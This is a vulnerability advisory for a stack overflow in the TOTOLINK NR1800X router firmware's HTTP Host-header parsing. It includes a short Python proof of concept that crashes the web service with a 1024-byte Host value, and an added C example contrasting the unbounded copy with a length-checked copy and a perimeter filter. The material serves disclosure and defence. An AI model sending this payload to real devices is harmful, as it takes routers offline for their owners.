# TOTOLINK NR1800X Firmware Stack Overflow Vulnerability Summary

## Vulnerability Overview

A stack overflow vulnerability exists in the HTTP request parsing logic of the TOTOLINK NR1800X firmware. An unauthenticated attacker can trigger memory corruption by sending an excessively long `Host` header, resulting in a service crash (DoS).

## Scope of Impact

- **Vendor**: TOTOLINK
- **Affected Product**: C834FR-1C (NR1800X)
- **Affected Firmware Version**: V9.1.0u6279_B20210910
- **Firmware Download URL**: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/225/idu/36.html

## Remediation

No official patch or upgrade recommendation is currently provided on the vendor's page. It is recommended that users contact the vendor to obtain security updates, or deploy firewall rules at the network perimeter to restrict anomalous HTTP requests.

## POC Code

```python
#!/usr/bin/env python3
import socket

TARGET = "192.168.211.128"   # lab device address
PORT = 80
PATH = "/formLoginAuth.htm?authCode=&action=login"
TIMEOUT = 5                  # connect/send timeout in seconds (was undefined in the original listing)


def send_once(host_value: str):
    # Build a minimal GET request whose Host header carries the test value.
    req = (
        f"GET {PATH} HTTP/1.1\r\n"
        f"Host: {host_value}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()
    with socket.create_connection((TARGET, PORT), timeout=TIMEOUT) as s:
        s.sendall(req)


payload = "A" * 0x400        # 1024-byte Host value, far beyond the 32-byte stack buffer
send_once(payload)
```

## Vulnerability Details

1. The entry point is the normal HTTP request processing function `http_request_parse`.
2. The `Host` header value is extracted and forwarded to `find_host_ip`.
3. `find_host_ip` performs a byte copy operation without strict length validation.
4. The destination in the caller is a small stack buffer (`char v113[32]`), so a long value overwrites the stack.
5. Sending a long `Host` value (e.g., 512+ bytes) reliably corrupts or crashes the service in the firmware/lab environment.

## Impact

- **Before Attack**: The target web service responds normally (e.g., 302 redirect).
- **After Attack**: After sending a long Host header, the service becomes unavailable (connection refused).
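The following C example is added here to illustrate the defect pattern described in the Vulnerability Details and the length check that fixes it, together with the kind of perimeter filter the Remediation section suggests. It is not TOTOLINK's firmware code: the function names (`find_header`, `copy_host_checked`, `host_header_is_anomalous`, `build_request`), the 253-byte perimeter threshold and the sample requests are assumptions and constructed inputs; only the 32-byte destination size (`char v113[32]`) comes from the advisory.

```c
/*
 * Added example (not the vendor's code): bounded Host-header extraction that
 * refuses values which would not fit the destination buffer, contrasted with
 * the unbounded copy pattern the advisory describes. HOST_BUF_LEN mirrors the
 * advisory's 32-byte stack buffer; everything else is a hypothetical reconstruction.
 */
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* strncasecmp */

#define HOST_BUF_LEN 32          /* mirrors `char v113[32]` from the advisory */
#define ANOMALY_HOST_LEN 253     /* perimeter threshold: max DNS name length (assumption) */

/* Locate an HTTP header value in a raw request. Returns a pointer to the first
 * byte of the value and stores its length (up to CRLF) in *len; NULL if absent.
 * Header names are matched case-insensitively. */
static const char *find_header(const char *req, const char *name, size_t *len)
{
    size_t nlen = strlen(name);
    const char *line = strstr(req, "\r\n");          /* CRLF ending the request line */
    while (line && line[2] != '\0' && line[2] != '\r') {
        line += 2;                                   /* start of the next header line */
        if (strncasecmp(line, name, nlen) == 0 && line[nlen] == ':') {
            const char *val = line + nlen + 1;
            while (*val == ' ' || *val == '\t') val++;
            const char *end = strstr(val, "\r\n");
            if (!end) end = val + strlen(val);
            *len = (size_t)(end - val);
            return val;
        }
        line = strstr(line, "\r\n");
    }
    return NULL;
}

/* UNSAFE pattern the advisory describes: the value length is attacker-controlled
 * and never compared with the destination size, so a long Host value overruns
 * the fixed-size stack buffer. Shown for contrast; only called with a short value. */
static void copy_host_unchecked(const char *req, char *dst)
{
    size_t len = 0;
    const char *val = find_header(req, "Host", &len);
    if (val) {
        memcpy(dst, val, len);   /* no bound: this is the defect */
        dst[len] = '\0';
    }
}

/* Hardened copy: 0 on success, -1 if Host is missing, -2 if the value
 * (plus terminating NUL) would not fit in dst. */
int copy_host_checked(const char *req, char *dst, size_t dst_len)
{
    size_t len = 0;
    const char *val = find_header(req, "Host", &len);
    if (!val) return -1;
    if (len >= dst_len) return -2;   /* the length validation the advisory says is missing */
    memcpy(dst, val, len);
    dst[len] = '\0';
    return 0;
}

/* Perimeter-style check for a reverse proxy or WAF in front of the device:
 * returns 1 when the Host value exceeds max_len, 0 otherwise (a missing Host
 * header is not flagged here). */
int host_header_is_anomalous(const char *req, size_t max_len)
{
    size_t len = 0;
    const char *val = find_header(req, "Host", &len);
    return (val && len > max_len) ? 1 : 0;
}

/* Constructed sample input: a GET request whose Host value is host_len 'A' bytes.
 * Returns 0 on success, -1 if out is too small. */
int build_request(char *out, size_t out_len, size_t host_len)
{
    const char *head = "GET / HTTP/1.1\r\nHost: ";
    const char *tail = "\r\nConnection: close\r\n\r\n";
    size_t hl = strlen(head), tl = strlen(tail);
    if (hl + host_len + tl + 1 > out_len) return -1;
    memcpy(out, head, hl);
    memset(out + hl, 'A', host_len);
    memcpy(out + hl + host_len, tail, tl + 1);   /* includes the NUL */
    return 0;
}

int main(void)
{
    char req[2048], host[HOST_BUF_LEN];
    build_request(req, sizeof req, 9);                 /* benign 9-byte value */
    copy_host_unchecked(req, host);
    printf("unchecked copy of short Host: %s\n", host);
    build_request(req, sizeof req, 0x400);             /* the advisory's 1024-byte value */
    printf("checked copy of 1024-byte Host: rc=%d\n", copy_host_checked(req, host, sizeof host));
    printf("flagged at perimeter: %d\n", host_header_is_anomalous(req, ANOMALY_HOST_LEN));
    return 0;
}
```

The checked copy rejects any value of 32 bytes or more before touching the buffer, which is the single comparison whose absence turns the parser into a crash primitive; the perimeter check applies a looser limit (253 bytes, the longest valid DNS name) so that a proxy can drop oversized Host headers without rejecting legitimate traffic while the device remains unpatched.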